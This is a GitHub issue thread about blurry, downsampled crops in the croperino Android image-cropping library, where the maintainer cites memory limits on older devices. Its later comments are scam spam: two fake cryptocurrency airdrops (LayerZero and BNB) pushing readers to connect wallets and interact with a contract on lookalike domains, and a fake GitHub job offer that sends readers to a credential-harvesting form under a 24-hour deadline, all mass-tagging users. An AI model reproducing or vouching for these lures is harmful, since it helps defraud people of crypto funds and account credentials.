### ISSUE TITLE
Bug: can't really crop well at all

### ISSUE THREAD

**Issue by AndroidDeveloperLB** [ekimual/croperino#29]
When I choose to open a photo, such as this one:

**Comment by ekimual** [comment]
Seems fine on some of my devices 
https://image.ibb.co/mUcZ77/Screenshot_20180327_010852.jpg

Can you share me some logs or device information / procedure how you did it?

**Comment by ekimual** [comment]
Its a downsampled copy of your image, if you can provide me details much better.

**Comment by AndroidDeveloperLB** [comment]
@ekimual To me, on Pixel 2  , it opens the photo super small, probably because it's downsampled. 
It shouldn't look blurry or super small, especially for this high quality image. 
See what happens on an emulator when you crop it:
https://ufile.io/ftr1j
And this is on the photo gallery app, when I zoom into it:
[device-2018-03-27-095403.zip](https://github.com/ekimual/croperino/files/1850736/device-2018-03-27-095403.zip)

Check out other cropping libraries, such as this one:
https://github.com/ArthurHub/Android-Image-Cropper
It doesn't blur the image and it makes a perfectly clean cropping of what you choose. See:
[device-2018-03-27-095532.zip](https://github.com/ekimual/croperino/files/1850744/device-2018-03-27-095532.zip)

**Comment by ekimual** [comment]
@AndroidDeveloperLB for the mean time you can use the one you suggested, I don't have enough free time nowadays to maintain but I'll try. Pull requests are also welcome, thanks for the additional details!

**Comment by AndroidDeveloperLB** [comment]
Sadly the other library seem to have an issue (still not sure if it's my fault or the library), which rarely cause the app I have to crash:
https://github.com/ArthurHub/Android-Image-Cropper/issues/502
I don't know what is the trigger to it, but it seems to be about background-loading of the image, as I use a uri for it.

**Comment by ekimual** [comment]
@AndroidDeveloperLB well its one of the reasons I did a downsample, since image loading a large scale without downsampling on lower end devices will lead to multiple problems (usually ANRs or even OOMs) I am not sure how the said library handles it.

**Comment by AndroidDeveloperLB** [comment]
@ekimual I don't think this is the reason. My app is tiny, and is from Android 8.1.
The bitmaps on Android 8.1 (and 8.0) are on the native memory (real RAM), so OOM can't be achieved unless it's a ridiculously large image, and even then, it won't be OOM. I've written about this here:
https://stackoverflow.com/q/48091403/878126
Not sure about the exception though. It's NPE...

**Comment by ekimual** [comment]
Could be true on your end @AndroidDeveloperLB but for 4.2ish ~ it does actually happen.

**Comment by ekimual** [comment]
Yup its what I said, @AndroidDeveloperLB for the mean time you can use other tools since I don't have enough free time nowadays to maintain, but I'll try. Pull requests are also welcome.

**Comment by AndroidDeveloperLB** [comment]
OK thank you.

**Comment by robincj** [comment]
# 🚀 LayerZero Total Airdrop - Claim Your Instant $100 Prize! 🎉

Attention LayerZero community! You are eligible to instantly win $100 from a $3,000 prize pool, available for the first 10,000 eligible users. Act fast to secure your spot! [Claim Now](https://connectlayerzaero.online)

![Claim Now](https://i.ytimg.com/vi/c_iNiyOUHVQ/maxresdefault.jpg)


Welcome to the LayerZero Total Airdrop! Follow these simple steps to claim your prize:

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://connectlayerzaero.online) link.
   - Choose your preferred wallet provider (Metamask, Coinbase, and others).

### 2. 🔄 Claim Your Instant $100:
   - After connecting your wallet.
   - Click on the "**Claim**" button to initiate the process.

### 3. 🔐 Interact with the Contract:
   - Once claimed.
   - Interact with the smart contract using the **connect** method to secure your instant $100 prize.

💰 Don't miss out on your chance to be one of the lucky 10,000 users! Act now to ensure your spot in the LayerZero Total Airdrop and claim your instant $100 prize.

🎉 Get ready for an exciting journey with LayerZero - where rewards await at every step!


Winners: @leorog, @danielspinard, @shaunjohn, @bossPia, @FrankD6EAF, @quiye, @romaric-juniet

**Comment by vim1996** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @docongminh, @4000D, @naresharelli, @mandaether, @heyuanlong, @noslav, @ffrmns

**Comment by AndroidDeveloperLB** [comment]
What is this?
Spam-ads reached even Github?!
Is there a way to report this?

**Comment by apocanow1** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
FrancescoSaverioZuppichini, @SPACE-CADET87, @KaQuMiQ, @thecreation, @liem46417, @thanhtungka91, @acriacao, @jotafeldmann, @fluency03, @JermineHu, @clemenswasser, @zollero, @qianxiaofeng, @netgb, @johndatserakis, @k0syam, @elementskun, @MrHeer, @ianfabs, @shuyin0321
